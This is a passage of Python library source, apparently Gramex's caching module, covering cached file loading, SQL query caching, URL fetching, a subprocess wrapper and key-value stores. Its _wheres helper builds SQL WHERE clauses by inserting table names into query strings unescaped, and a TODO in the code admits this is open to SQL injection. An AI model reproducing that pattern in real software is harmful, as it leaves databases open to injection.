'markdown.extensions.codehilite',
'markdown.extensions.extra',
'markdown.extensions.toc',
'markdown.extensions.meta',
'markdown.extensions.sane_lists',
'markdown.extensions.smarty',
])
# A set of temporary files to delete on program exit
_TEMP_FILES = set()
_ID_CACHE = set()
def _delete_temp_files():
for path in _TEMP_FILES:
if os.path.exists(path):
os.remove(path)
atexit.register(_delete_temp_files)
def hashfn(fn):
'''Returns a unique hash value for the function.'''
# id() returns a unique value for the lifetime of an object.
# To ensure that ID is not re-cycled, cache object, so it's never released.
_ID_CACHE.add(fn)
return id(fn)
def cache_key(*args):
'''Converts arguments into a string suitable for use as a cache key'''
return json.dumps(args, sort_keys=True, separators=(',', ':'))
def opener(callback, read=False, **open_kwargs):
'''
Converts any function that accepts a string or handle as its parameter into
a function that takes the first parameter from a file path.
Here are a few examples::
jsonload = opener(json.load)
jsonload('x.json') # opens x.json and runs json.load(handle)
gramex.cache.open('x.json', jsonload) # Loads x.json, cached
# read=True parameter passes the contents (not handle) to the function
template = opener(string.Template, read=True)
template('abc.txt').substitute(x=val)
gramex.cache.open('abc.txt', template).substitute(x=val)
# If read=True, callback may be None. The result of .read() is passed as-is
text = opener(None, read=True)
gramex.cache.open('abc.txt', text)
Keyword arguments applicable for ``io.open`` are passed to ``io.open``. These
default to ``io.open(mode='r', buffering=-1, encoding='utf-8',
errors='strict', newline=None, closefd=True)``. All other arguments and
keyword arguments are passed to the callback (e.g. to ``json.load``).
When reading binary files, pass ``mode='rb', encoding=None, errors=None``.
'''
merge(open_kwargs, _opener_defaults, 'setdefault')
if read:
# Pass contents to callback
def method(path, **kwargs):
open_args = {key: kwargs.pop(key, val) for key, val in open_kwargs.items()}
with io.open(path, **open_args) as handle:
result = handle.read()
return callback(result, **kwargs) if callable(callback) else result
else:
if not callable(callback):
raise ValueError('opener callback %s not a function', repr(callback))
# Pass handle to callback
def method(path, **kwargs):
open_args = {key: kwargs.pop(key, val) for key, val in open_kwargs.items()}
with io.open(path, **open_args) as handle:
return callback(handle, **kwargs)
return method
@opener
def _markdown(handle, **kwargs):
from markdown import markdown
return markdown(handle.read(), **{k: kwargs.pop(k, v) for k, v in _markdown_defaults.items()})
@opener
def _yaml(handle, **kwargs):
import yaml
defaults = {'Loader': yaml.FullLoader}
return yaml.load(handle.read(), **{k: kwargs.pop(k, v) for k, v in defaults.items()})
def _template(path, **kwargs):
root, name = os.path.split(path)
return tornado.template.Loader(root, **kwargs).load(name)
def read_excel(io, sheet_name=0, table=None, name=None, range=None, header=_undef, **kwargs):
'''
Read data from an Excel file as a DataFrame
:arg str/file io: path or file-like object pointing to an Excel file
:arg str/int sheet_name: sheet to load data from. Sheet names are specified as strings.
Integers pick zero-indexed sheet position. default: 0
:arg str table: Worksheet table to load from sheet, e.g. ``'Table1'``
:arg str name: Defined name to load from sheet, e.g. ``'MyNamedRange'``
:arg str range: Cell range to load from sheet, e.g. ``'A1:C10'``
:arg None/int/list[int] header: Row (0-indexed) to use for the column labels.
A list of integers is combined into a MultiIndex. Use None if there is no header.
If none of ``table``, ``name``, ``range`` are specified, this loads the entire sheet using
``pd.read_excel``. All other keyword arguments are passed through to ``pd.read_excel``.
If any of these are specified, we use ``openpyxl`` to read a specific cell range and infer
column types. ``table`` overrides ``name`` overrides ``range``.
'''
if not any((range, name, table)):
return pd.read_excel(io, sheet_name=sheet_name, header=0 if header is _undef else header,
**kwargs)
import openpyxl
wb = openpyxl.load_workbook(io, data_only=True)
# Pick a SINGLE sheet using sheet_name -- it can be an int or a str
ws = wb[wb.sheetnames[sheet_name] if isinstance(sheet_name, int) else sheet_name]
# Get the data range to be picked
if table is not None:
range = ws.tables[table].ref
# Tables themselves specify whether they have a column header. Use this as default
if header is _undef:
header = list(__builtins__['range'](ws.tables[table].headerRowCount))
elif name is not None:
# If the name is workbook-scoped, get it directly
defined_name = wb.defined_names.get(name)
# Else, if it's sheet-scoped, get it related to the sheet
if defined_name is None:
defined_name = wb.defined_names.get(name, wb.sheetnames.index(ws.title))
# Raise an error if we can't find it
if defined_name is None:
raise ValueError(f'{io}: missing name {name} in sheet {sheet_name}')
# Note: This only works if it's a cell range. If we create a named range inside a table,
# Excel may store this as =Table[[#All],[Col1]:[Col5]], which isn't a valid range.
# Currently, we ignore that, and assumed that the name is like Sheet1!A1:C10
range = defined_name.attr_text.split('!')[-1]
data = pd.DataFrame([[cell.value for cell in row] for row in ws[range]])
# Header defaults to 0 if undefined. If it's not None, apply the header
header = 0 if header is _undef else header
if header is not None:
data = (data.T.set_index(header).T # Set header rows as column names
.reset_index(drop=True) # Drop index with "holes" where headers were
.rename_axis( # Column name has header index (e.g. 0). Drop it
[None] * len(header) if isinstance(header, (list, tuple)) else None,
axis=1))
return data.infer_objects() # Convert data types
def stat(path):
'''
Returns a file status tuple - based on file last modified time and file size
'''
if os.path.exists(path):
stat = os.stat(path)
return (stat.st_mtime, stat.st_size)
return (None, None)
def hashed(val):
'''Return the hashed value of val. If not possible, return None'''
try:
hash(val)
return val
except TypeError:
try:
return json.dumps(val, sort_keys=True, separators=(',', ':'))
except Exception:
return None
# gramex.cache.open() stores its cache here.
# {(path, callback): {data: ..., stat: ...}}
_OPEN_CACHE = {}
open_callback = dict(
bin=opener(None, read=True, mode='rb', encoding=None, errors=None),
txt=opener(None, read=True),
text=opener(None, read=True),
csv=pd.read_csv,
excel=read_excel,
xls=read_excel,
xlsx=read_excel,
hdf=pd.read_hdf,
h5=pd.read_hdf,
html=pd.read_html,
json=opener(json.load),
jsondata=pd.read_json,
sas=pd.read_sas,
stata=pd.read_stata,
table=pd.read_table,
parquet=pd.read_parquet,
feather=pd.read_feather,
md=_markdown,
markdown=_markdown,
tmpl=_template,
template=_template,
xml=etree.parse,
svg=etree.parse,
rss=etree.parse,
atom=etree.parse,
config=PathConfig,
yml=_yaml,
yaml=_yaml
)
def open(path, callback=None, transform=None, rel=False, **kwargs):
'''
Reads a file, processes it via a callback, caches the result and returns it.
When called again, returns the cached result unless the file has updated.
By default, it determine the file type using the extension. For example::
open('data.yaml') # Loads a YAML file
open('data.csv') # Loads a CSV file
The 2nd parameter (callback) accepts a predefined string that can be one of:
- ``bin``: reads binary files using io.open
- ``text`` or ``txt``: reads text files using io.open
- ``yaml``: reads files using yaml.load via io.open
- ``config``: reads files using using :py:class:`gramex.config.PathConfig`.
Same as ``yaml``, but allows ``import:`` and variable substitution.
- ``json``: reads files using json.load via io.open
- ``jsondata``: reads files using pd.read_json
- ``template``: reads files using tornado.Template via io.open
- ``markdown`` or ``md``: reads files using markdown.markdown via io.open
- ``csv``, ``excel``, ``xls``, ``xlsx``, ``hdf``, ``h5``, ``html``, ``sas``,
``stata``, ``table``, ``parquet``, ``feather``: reads using Pandas
- ``xml``, ``svg``, ``rss``, ``atom``: reads using lxml.etree
For example::
# Load data.yaml as YAML into an AttrDict
open('data.yaml', 'yaml')
# Load data.json as JSON into an AttrDict
open('data.json', 'json', object_pairs_hook=AttrDict)
# Load data.csv as CSV into a Pandas DataFrame
open('data.csv', 'csv', encoding='cp1252')
It can also be a function that accepts the filename and any other arguments::
# Load data using a custom callback
open('data.fmt', my_format_reader_function, arg='value')
This is called as ``my_format_reader_function('data.fmt', arg='value')`` and
cached. Future calls do not re-load and re-calculate this data.
To support a new callback string, set ``gramex.cache.open_callback[key] = method``.
For example::
gramex.cache.open_callback['shp'] = geopandas.read_file # Register
prs = gramex.cache.open('my.shp', layer='countries') # Open with method
``transform=`` is an optional function that processes the data returned by
the callback. For example::
# Returns the count of the CSV file, updating it only when changed
open('data.csv', 'csv', transform=lambda data: len(data))
# After loading data.xlsx into a DataFrame, returned the grouped result
open('data.xlsx', 'xslx', transform=lambda data: data.groupby('city')['sales'].sum())
If ``transform=`` is not a callable, it is ignored, but used as a cache key.
``rel=True`` opens the path relative to the caller function's file path. If
``D:/app/calc.py`` calls ``open('data.csv', 'csv', rel=True)``, the path
is replaced with ``D:/app/data.csv``.
Any other keyword arguments are passed directly to the callback. If the
callback is a predefined string and uses io.open, all argument applicable to
io.open are passed to io.open and the rest are passed to the callback.
'''
# Pass _reload_status = True for testing purposes. This returns a tuple:
# (result, reloaded) instead of just the result.
_reload_status = kwargs.pop('_reload_status', False)
reloaded = False
_cache = kwargs.pop('_cache', _OPEN_CACHE)
# Get the parent frame's filename. Compute path relative to that.
if rel:
stack = inspect.getouterframes(inspect.currentframe(), 2)
folder = os.path.dirname(os.path.abspath(stack[1][1]))
path = os.path.join(folder, path)
original_callback = callback
if callback is None:
callback = os.path.splitext(path)[-1][1:]
callback_is_str = isinstance(callback, six.string_types)
key = (
path,
original_callback if callback_is_str else id(callback),
hashfn(transform),
frozenset(((k, hashed(v)) for k, v in kwargs.items())),
)
cached = _cache.get(key, None)
fstat = stat(path)
if cached is None or fstat != cached.get('stat'):
reloaded = True
if callable(callback):
data = callback(path, **kwargs)
elif callback_is_str:
method = None
if callback in open_callback:
method = open_callback[callback]
if method is not None:
data = method(path, **kwargs)
elif original_callback is None:
raise TypeError('gramex.cache.open: path "%s" has unknown extension' % path)
else:
raise TypeError('gramex.cache.open(callback="%s") is not a known type' % callback)
else:
raise TypeError('gramex.cache.open(callback=) must be a function, not %r' % callback)
if callable(transform):
data = transform(data)
cached = {'data': data, 'stat': fstat}
try:
_cache[key] = cached
except Exception:
app_log.error('gramex.cache.open: %s cannot cache %r' % (type(_cache), data))
result = cached['data']
return (result, reloaded) if _reload_status else result
def set_cache(cache, old_cache):
'''
Use ``cache`` as the new cache for all open requests.
Copies keys from old cache, and deletes them from the old cache.
'''
for key in list(old_cache.keys()):
cache[key] = old_cache[key]
del old_cache[key]
return cache
_SAVE_CALLBACKS = dict(
json='to_json',
csv='to_csv',
xlsx='to_excel',
hdf='to_hdf',
html='to_html',
stata='to_stata',
# Other configurations not supported
)
def save(data, url, callback=None, **kwargs):
'''
Saves a DataFrame into file at url. It does not cache.
``callback`` is almost the same as for :py:func:`gramex.cache.open`. It can
be ``json``, ``csv``, ``xlsx``, ``hdf``, ``html``, ``stata`` or
a function that accepts the filename and any other arguments.
Other keyword arguments are passed directly to the callback.
'''
if callback is None:
callback = os.path.splitext(url)[-1][1:]
if callable(callback):
return callback(data, url, **kwargs)
elif callback in _SAVE_CALLBACKS:
method = getattr(data, _SAVE_CALLBACKS[callback])
return method(url, **(used_kwargs(method, kwargs)[0]))
else:
raise TypeError('gramex.cache.save(callback="%s") is unknown' % callback)
# gramex.cache.query() stores its cache here
_QUERY_CACHE = {}
_STATUS_METHODS = {}
def _wheres(dbkey, tablekey, default_db, names, fn=None):
'''
Convert a table name list like ['sales', 'dept.sales']) to a WHERE clause
like ``(table="sales") OR (db="dept" AND table="sales")``.
TODO: escape the table names to avoid SQL injection attacks
'''
where = []
for name in names:
db, table = name.rsplit('.', 2) if '.' in name else (default_db, name)
if not fn:
where.append("({}='{}' AND {}='{}')".format(dbkey, db, tablekey, table))
else:
where.append("({}={}('{}') AND {}={}('{}'))".format(
dbkey, fn[0], db, tablekey, fn[1], table))
return ' OR '.join(where)
def _table_status(engine, tables):
'''
Returns the last updated date of a list of tables.
'''
# Cache the SQL query or file date check function beforehand.
# Every time method is called with a URL and table list, run cached query
dialect = engine.dialect.name
key = (engine.url, tuple(tables))
db = engine.url.database
if _STATUS_METHODS.get(key, None) is None:
if len(tables) == 0:
raise ValueError('gramex.cache.query table list is empty: %s', repr(tables))
for name in tables:
if not name or not isinstance(name, six.string_types):
raise ValueError('gramex.cache.query invalid table list: %s', repr(tables))
if dialect == 'mysql':
# https://dev.mysql.com/doc/refman/5.7/en/tables-table.html
# Works only on MySQL 5.7 and above
q = ('SELECT update_time FROM information_schema.tables WHERE ' +
_wheres('table_schema', 'table_name', db, tables))
elif dialect == 'mssql':
# https://goo.gl/b4aL9m
q = ('SELECT last_user_update FROM sys.dm_db_index_usage_stats WHERE ' +
_wheres('database_id', 'object_id', db, tables, fn=['DB_ID', 'OBJECT_ID']))
elif dialect == 'postgresql':
# https://www.postgresql.org/docs/9.6/static/monitoring-stats.html
q = ('SELECT n_tup_ins, n_tup_upd, n_tup_del FROM pg_stat_all_tables WHERE ' +
_wheres('schemaname', 'relname', 'public', tables))
elif dialect == 'sqlite':
if not db:
raise KeyError('gramex.cache.query does not support memory sqlite "%s"' % dialect)
q = db
else:
raise KeyError('gramex.cache.query cannot cache dialect "%s" yet' % dialect)
if dialect == 'sqlite':
_STATUS_METHODS[key] = lambda: stat(q)
else:
_STATUS_METHODS[key] = lambda: pd.read_sql(q, engine).to_json(orient='records')
return _STATUS_METHODS[key]()
def query(sql, engine, state=None, **kwargs):
'''
Read SQL query or database table into a DataFrame. Caches results unless
state has changed. It always re-runs the query unless state is specified.
The state can be specified in 3 ways:
1. A string. This must be as a lightweight SQL query. If the result changes,
the original SQL query is re-run.
2. A function. This is called to determine the state of the database.
3. A list of tables. This list of ["db.table"] names specifies which tables
to watch for. This is currently experimental.
4. ``None``: the default. The query is always re-run and not cached.
'''
# Pass _reload_status = True for testing purposes. This returns a tuple:
# (result, reloaded) instead of just the result.
_reload_status = kwargs.pop('_reload_status', False)
reloaded = False
_cache = kwargs.pop('_cache', _QUERY_CACHE)
store_cache = True
key = (str(sql), json.dumps(kwargs.get('params', {}), sort_keys=True), engine.url)
cached = _cache.get(key, {})
current_status = cached.get('status', None) if cached else None
if isinstance(state, (list, tuple)):
status = _table_status(engine, tuple(state))
elif isinstance(state, six.string_types):
status = pd.read_sql(state, engine).to_dict(orient='list')
elif callable(state):
status = state()
elif state is None:
# Create a new status every time, so that the query is always re-run
status = object()
store_cache = False
else:
raise TypeError('gramex.cache.query(state=) must be a table list, query or fn, not %s',
repr(state))
if status == current_status:
result = _cache[key]['data']
else:
app_log.debug('gramex.cache.query: %s. engine: %s. state: %s. kwargs: %s', sql, engine,
state, kwargs)
result = pd.read_sql(sql, engine, **kwargs)
if store_cache:
_cache[key] = {
'data': result,
'status': status,
}
reloaded = True
return (result, reloaded) if _reload_status else result
# gramex.cache.reload_module() stores its cache here. {module_name: file_stat}
_MODULE_CACHE = {}
def reload_module(*modules):
'''
Reloads one or more modules if they are outdated, i.e. only if required the
underlying source file has changed.
For example::
import mymodule # Load cached module
reload_module(mymodule) # Reload module if the source has changed
This is most useful during template development. If your changes are in a
Python module, add adding these lines to pick up new module changes when
the template is re-run.
'''
for module in modules:
name = getattr(module, '__name__', None)
path = getattr(module, '__file__', None)
# sys.__file__ does not exist, but don't raise a warning. You can't reload it
if name in {'sys'}:
continue
if name is None or path is None or not os.path.exists(path):
app_log.warning('Path for module %s is %s: not found', name, path)
continue
# On Python 3, __file__ points to the .py file. In Python 2, it's the .pyc file
# https://www.python.org/dev/peps/pep-3147/#file
if path.lower().endswith('.pyc'):
path = path[:-1]
if not os.path.exists(path):
app_log.warning('Path for module %s is %s: not found', name, path)
continue
# The first time, don't reload it. Thereafter, if it's older or resized, reload it
fstat = stat(path)
if fstat != _MODULE_CACHE.get(name, fstat):
app_log.info('Reloading module %s', name)
six.moves.reload_module(module)
_MODULE_CACHE[name] = fstat
def urlfetch(path, info=False, **kwargs):
'''
- If path is a file path, return as is.
- If path is a file path and info is true, return a dict with name (filepath),
ext (extension), and content_type as well as r, url set to None.
- If path is a URL, download the file, return the saved filename.
The filename extension is based on the URL's Content-Type HTTP header.
- If info is true, returns a dict with name (filename), r (request)
url, ext (extension), content_type.
- Any other keyword arguments are passed to requests.get.
- Automatically delete the files on exit of the application.
- This is a synchronous function, i.e. it waits until the file is downloaded.
'''
url = urlparse(path)
if url.scheme not in {'http', 'https'}: # path is a filepath
if info:
ext = os.path.splitext(path)[1]
content_type = mimetypes.guess_type(path, strict=True)[0]
return {'name': path, 'r': None, 'url': None, 'ext': ext, 'content_type': content_type}
else:
return path
r = requests.get(path, **kwargs)
if 'Content-Type' in r.headers:
content_type = r.headers['Content-Type'].split(';')[0]
ext = mimetypes.guess_extension(content_type, strict=False)
else:
ext = os.path.splitext(url.path)[1]
with tempfile.NamedTemporaryFile(suffix=ext, delete=False) as handle:
for chunk in r.iter_content(chunk_size=16384):
handle.write(chunk)
_TEMP_FILES.add(handle.name)
if info:
return {'name': handle.name, 'r': r, 'url': url, 'ext': ext, 'content_type': content_type}
else:
return handle.name
class Subprocess(object):
'''
tornado.process.Subprocess does not work on Windows.
https://github.com/tornadoweb/tornado/issues/1585
This is a threaded alternative based on
http://stackoverflow.com/a/4896288/100904
Run a program async and wait for it to execute. Then get its output::
stdout, stderr = yield Subprocess(['ls', '-la']).wait_for_exit()
Run a program async and send each line to the handler as it writes::
yield Subprocess(
['ls', '-la'], # Run 'ls -la'
buffer_size='line', # Buffer output line by line
stream_stdout=handler.write, # Send output to handler.write(line)
stream_stderr=handler.write, # Send errors to handler.write(line)
)
Run a program async and appends output into a list::
proc = Subprocess(
['ls', '-la'],
buffer_size='line',
stream_stdout='list_out', # Append output to self.list_out
stream_stderr='list_err', # Append errors to self.list_err
)
output = proc.list_out[-10:] # Return last 10 lines of output
yield proc.wait_for_exit() # Wait until application is done
Run a program async and appends output into a queue::
proc = Subprocess(
['ls', '-la'], # Run 'ls -la'
buffer_size='line', # Buffer output line by line
stream_stdout='queue_out', # Save output in proc.out queue
stream_stderr='queue_err', # Save errors in proc.err queue
)
output = proc.queue_out.get_nowait() # Returns first line of output
yield proc.wait_for_exit() # Wait until application is done
To write to multiple streams, pass a list::
proc = Subprocess(
args,
buffer_size='line',
stream_stdout=[handler.write, 'list_out', 'queue_out', my_callback],
stream_stderr=[handler.write, 'list_err', 'queue_err', my_callback],
**kwargs
)
yield proc.wait_for_exit()
To check the process return code, use ``.proc`` which has the ``Popen``
object::
if proc.proc.returncode:
raise Exception('Process failed with return code %d', proc.proc.returncode)
:arg list args: command line arguments passed as a list to Subprocess
:arg methodlist stream_stdout: optional list of write methods - called when stdout has data
:arg methodlist stream_stderr: optional list of write methods - called when stderr has data
:arg str_or_int buffer_size: 'line' to write line by line, any int for chunk size
:arg dict kwargs: additional kwargs passed to subprocess.Popen
stream_stdout and stream_stderr can be:
- a function that accept a byte string. Called as stdout/stderr are buffered
- OR a string starting with ``list_`` or ``queue_``. Appends buffered output
- OR a list of any of the above
- OR an empty list. In this case, ``.wait_for_exit()`` returns a tuple with
``stdout`` and ``stderr`` as a tuple of byte strings.
'''
def __init__(self, args, stream_stdout=[], stream_stderr=[], buffer_size=0, **kwargs):
self.args = args
# self.proc.stdout & self.proc.stderr are streams with process output
kwargs['stdout'] = kwargs['stderr'] = subprocess.PIPE
# On UNIX, close all file descriptors except 0, 1, 2 before child
# process is executed. I've no idea why. Copied from
# http://stackoverflow.com/a/4896288/100904
kwargs['close_fds'] = 'posix' in sys.builtin_module_names
self.proc = subprocess.Popen(args, **kwargs) # nosec
self.thread = {} # Has the running threads
self.future = {} # Stores the futures indicating stream close
self.loop = _get_current_ioloop()
# Buffering has 2 modes. buffer_size='line' reads and writes line by line
# buffer_size=<number> reads in byte chunks. Define the appropriate method
if hasattr(buffer_size, 'lower') and 'line' in buffer_size.lower():
def _write(stream, callbacks, future, retval):
'''Call callbacks with content from stream. On EOF mark future as done'''
while True:
content = stream.readline()
if len(content) > 0:
if isinstance(content, six.text_type):
content = content.encode('utf-8')
for callback in callbacks:
callback(content)
else:
stream.close()
break
while self.proc.poll() is None:
time.sleep(MILLISECOND)
self.loop.add_callback(future.set_result, retval())
else:
# If the buffer size is 0 or negative, use the default buffer size to read
if buffer_size <= 0:
buffer_size = io.DEFAULT_BUFFER_SIZE
def _write(stream, callbacks, future, retval):
'''Call callbacks with content from stream. On EOF mark future as done'''
while True:
content = stream.read(buffer_size)
size = len(content)
if size > 0:
if isinstance(content, six.text_type):
content = content.encode('utf-8')
for callback in callbacks:
# This may raise a ValueError: write to closed file.
# TODO: decide how to handle it.
callback(content)
if size < buffer_size:
stream.close()
break
while self.proc.poll() is None:
time.sleep(MILLISECOND)
self.loop.add_callback(future.set_result, retval())
callbacks_lookup = {'stdout': stream_stdout, 'stderr': stream_stderr}
for stream in ('stdout', 'stderr'):
callbacks = callbacks_lookup[stream]
# If stream_stdout or stream_stderr are not defined, construct a
# BytesIO and return its value when the stream is closed
if not callbacks:
ret_stream = io.BytesIO()
callbacks = [ret_stream.write]
retval = ret_stream.getvalue
else:
retval = lambda: b'' # noqa
# If stream_stdout or stream_stderr has 'out' or 'err', create these
# as queue attributes (self.out, self.err)
callbacks = list(callbacks) if isinstance(callbacks, list) else [callbacks]
for index, method in enumerate(callbacks):
if isinstance(method, six.string_types):
if method.startswith('list_'):
if hasattr(self, method):
callbacks[index] = getattr(self, method).append
else:
log = []
setattr(self, method, log)
callbacks[index] = log.append
elif method.startswith('queue_'):
if hasattr(self, method):
callbacks[index] = getattr(self, method).put
else:
log = Queue()
setattr(self, method, log)
callbacks[index] = log.put
else:
raise ValueError('Invalid stream_%s: %s', stream, method)
self.future[stream] = future = Future()
# Thread writes from self.proc.stdout / stderr to appropriate callbacks
self.thread[stream] = t = Thread(
target=_write,
name=f'cache.Subprocess: {args}',
args=(getattr(self.proc, stream), callbacks, future, retval))
t.daemon = True # Thread dies with the program
t.start()
def wait_for_exit(self):
'''
Returns futures for (stdout, stderr). To wait for the process to complete, use::
stdout, stderr = yield proc.wait_for_exit()
'''
return [self.future['stdout'], self.future['stderr']]
_daemons = {}
_regex_type = type(re.compile(''))
# Python 3 needs sys.stderr.buffer.write for writing binary strings
_stderr_write = sys.stderr.buffer.write if hasattr(sys.stderr, 'buffer') else sys.stderr.write
def daemon(args, restart=1, first_line=None, stream=True, timeout=5, buffer_size='line', **kwargs):
'''
This is the same as :py:class:`Subprocess`, but has a few additional checks.
1. If we have already called :py:class:`Subprocess` with the same arguments,
re-use the same instance.
2. Send the process STDOUT and STDERR to this application's STDERR. This
makes it easy to see what errors the application reports.
3. Supports retry attempts.
4. Checks if the first line of output is a matches a string / re -- ensuring
that the application started properly.
'''
arg_str = args if isinstance(args, six.string_types) else ' '.join(args)
try:
key = cache_key(arg_str, kwargs)
except (TypeError, ValueError):
app_log.error('daemon args must be JSON serializable')
raise
# Send the stdout and stderr to (a) stderr AND to (b) a local queue we read
queue = Queue(maxsize=10)
for channel in ('stream_stdout', 'stream_stderr'):
if channel not in kwargs:
kwargs[channel] = []
elif not isinstance(kwargs[channel], list):
kwargs[channel] = [kwargs[channel]]
if first_line:
kwargs[channel].append(queue.put)
if stream is True:
kwargs[channel].append(_stderr_write)
elif callable(stream):
kwargs[channel].append(stream)
# Buffer by line by default. This is required for the first_line check, not otherwise.
kwargs['buffer_size'] = buffer_size
# started is set if we actually call Subprocess as part of this function
started = False
# If process was never started, start it
if key not in _daemons:
started = _daemons[key] = Subprocess(args, **kwargs)
# Ensure that process is running. Restart if required
proc = _daemons[key]
restart = int(restart)
while proc.proc.returncode is not None and restart > 0:
restart -= 1
proc = started = _daemons[key] = Subprocess(args, **kwargs)
if proc.proc.returncode is not None:
raise RuntimeError('Error %d starting %s' % (proc.proc.returncode, arg_str))
if started:
app_log.info('Started: %s', arg_str)
future = Future()
# If process was started, wait until it has initialized. Else just return the proc
if first_line and started:
if isinstance(first_line, six.string_types):
def check(proc):
actual = queue.get(timeout=timeout).decode('utf-8')
if first_line not in actual:
raise AssertionError('%s: wrong first line: %s (no "%s")' %
(arg_str, actual, first_line))
elif isinstance(first_line, _regex_type):
def check(proc):
actual = queue.get(timeout=timeout).decode('utf-8')
if not first_line.search(actual):
raise AssertionError('%s: wrong first line: %s' % (arg_str, actual))
elif callable(first_line):
check = first_line
loop = _get_current_ioloop()
def checker(proc):
try:
check(proc)
except Exception as e:
loop.add_callback(future.set_exception, e)
else:
loop.add_callback(future.set_result, proc)
proc._check_thread = t = Thread(target=checker, args=(proc, ))
t.daemon = True # Thread dies with the program
t.start()
else:
future.set_result(proc)
return future
def _get_current_ioloop():
'''
Return the current IOLoop. But if we're not already in an IOLoop, return an
object that mimics add_callback() by running the method immediately.
This allows daemon() to be run without Tornado / asyncio.
'''
loop = IOLoop.current(instance=False)
if loop is None:
loop = AttrDict(add_callback=lambda fn, *args, **kwargs: fn(*args, **kwargs))
return loop
def get_store(type, **kwargs):
if type == 'memory':
return KeyStore(**kwargs)
elif type == 'sqlite':
return SQLiteStore(**kwargs)
elif type == 'json':
return JSONStore(**kwargs)
elif type == 'redis':
return RedisStore(**kwargs)
elif type == 'hdf5':
return HDF5Store(**kwargs)
else:
raise NotImplementedError('Store type: %s not implemented' % type)
class KeyStore(object):
'''
Base class for persistent dictionaries. (But KeyStore is not persistent.)
>>> store = KeyStore()
>>> value = store.load(key, None) # Load a value. It's like dict.get()
>>> store.dump(key, value) # Save a value. It's like dict.set(), but doesn't flush
>>> store.flush() # Saves to disk
>>> store.close() # Close the store
You can initialize a KeyStore with a ``flush=`` parameter. The store is
flushed to disk via ``store.flush()`` every ``flush`` seconds.
If a ``purge=`` is provided, the data is purged of missing values every
``purge`` seconds. You can provide a custom ``purge_keys=`` function that
returns an iterator of keys to delete if any.
When the program exits, ``.close()`` is automatically called.
'''
def __init__(self, flush=None, purge=None, purge_keys=None, **kwargs):
'''Initialise the KeyStore at path'''
self.store = {}
if callable(purge_keys):
self.purge_keys = purge_keys
elif purge_keys is not None:
app_log.error(
'KeyStore: purge_keys=%r invalid. Must be function(dict)',
purge_keys)
# Periodically flush and purge buffers
if flush is not None:
PeriodicCallback(self.flush, callback_time=flush * 1000).start()
if purge is not None:
PeriodicCallback(self.purge, callback_time=purge * 1000).start()
# Call close() when Python gracefully exits
atexit.register(self.close)
def keys(self):
'''Return all keys in the store'''
return self.store.keys()
def load(self, key, default=None):
'''Same as store.get(), but called "load" to indicate persistence'''
key = self._escape(key)
return self.store.get(key, {} if default is None else default)
def dump(self, key, value):
'''Same as store[key] = value'''
key = self._escape(key)
self.store[key] = value
def _escape(self, key):
'''Converts key into a unicode string (interpreting byte-string keys as UTF-8)'''
if isinstance(key, six.binary_type):
return six.text_type(key, encoding='utf-8')
return six.text_type(key)
@staticmethod
def purge_keys(data):
return [key for key, val in data.items() if val is None]
def flush(self):
'''Write to disk'''
pass
def purge(self):
'''Delete empty keys and flush'''
for key in self.purge_keys(self.store):
try:
del self.store[key]
except KeyError:
# If the key was already removed from store, ignore
pass
self.flush()
def close(self):
'''Flush and close all open handles'''
raise NotImplementedError()
class RedisStore(KeyStore):
'''
A KeyStore that stores data in a Redis database. Typical usage::
>>> store = RedisStore('localhost:6379:1:password=x:...') # host:port:db:params
>>> value = store.load(key)
>>> store.dump(key, value)
The path in the constructor contains parameters separated by colon (:):
- `host`: the Redis server location (default: localhost)
- `port`: the Redis server port (default: 6379)
- `db`: the Redis server DB number (default: 0)
- zero or more parameters passed to StrictRedis (e.g. password=abc)
Values are encoded as JSON using gramex.config.CustomJSONEncoder (thus
handling datetime.) Keys are JSON encoded.
'''
def __init__(self, path=None, *args, **kwargs):
super(RedisStore, self).__init__(*args, **kwargs)
from redis import StrictRedis
host, port, db, redis_kwargs = 'localhost', 6379, 0, {}
if isinstance(path, six.string_types):
parts = path.split(':')
if len(parts):
host = parts.pop(0)
if len(parts):
port = int(parts.pop(0))
if len(parts):
db = int(parts.pop(0))
redis_kwargs = dict(part.split('=', 2) for part in parts)
redis_kwargs['decode_responses'] = True
redis_kwargs.setdefault('encoding', 'utf-8')
self.store = StrictRedis(host=host, port=port, db=db, **redis_kwargs)
def load(self, key, default=None):
result = self.store.get(key)
if result is None:
return default
try:
return json.loads(
result, object_pairs_hook=AttrDict, cls=CustomJSONDecoder)
except ValueError:
app_log.error('RedisStore("%s").load("%s") is not JSON ("%r..."")',
self.store, key, result)
return default
def dump(self, key, value):
if value is None:
self.store.delete(key)
else:
value = json.dumps(
value,
ensure_ascii=True,
separators=(',', ':'),
cls=CustomJSONEncoder)
self.store.set(key, value)
def close(self):
pass
def purge(self):
app_log.debug('Purging %s', self.store)
# TODO: optimize item retrieval
items = {key: self.load(key, None) for key in self.store.keys()}
for key in self.purge_keys(items):
self.store.delete(key)
class SQLiteStore(KeyStore):
'''
A KeyStore that stores data in a SQLite file. Typical usage::
>>> store = SQLiteStore('file.db', table='store')
>>> value = store.load(key)
>>> store.dump(key, value)
Values are encoded as JSON using gramex.config.CustomJSONEncoder (thus
handling datetime.) Keys are JSON encoded.
'''
def __init__(self, path, table='store', *args, **kwargs):
super(SQLiteStore, self).__init__(*args, **kwargs)
self.path = _create_path(path)
from sqlitedict import SqliteDict
self.store = SqliteDict(
self.path, tablename=table, autocommit=True,
encode=lambda v: json.dumps(v, separators=(',', ':'), ensure_ascii=True,
cls=CustomJSONEncoder),
decode=lambda v: json.loads(v, object_pairs_hook=AttrDict, cls=CustomJSONDecoder),
)
def close(self):
self.store.close()
def flush(self):
super(SQLiteStore, self).flush()
self.store.commit()
def keys(self):
# Keys need to be escaped
return (self._escape(key) for key in self.store.keys())
def purge(self):
app_log.debug('Purging %s', self.path)
super(SQLiteStore, self).purge()
class HDF5Store(KeyStore):
'''
A KeyStore that stores data in a HDF5 file. Typical usage::
>>> store = HDF5Store('file.h5', flush=15)
>>> value = store.load(key)
>>> store.dump(key, value)
Internally, it uses HDF5 groups to store data. Values are encoded as JSON
using gramex.config.CustomJSONEncoder (thus handling datetime.) Keys are JSON
encoded, and '/' is escaped as well (since HDF5 groups treat / as subgroups.)
'''
def __init__(self, path, *args, **kwargs):
super(HDF5Store, self).__init__(*args, **kwargs)
self.path = _create_path(path)
self.changed = False
import h5py
# h5py.File fails with OSError: Unable to create file (unable to open file: name =
# '.meta.h5', errno = 17, error message = 'File exists', flags = 15, o_flags = 502)
# TODO: identify why this happens and resolve it.
self.store = h5py.File(self.path, 'a')
def load(self, key, default=None):
# Keys cannot contain / in HDF5 store. Escape it
key = self._escape(key).replace('/', '\t')
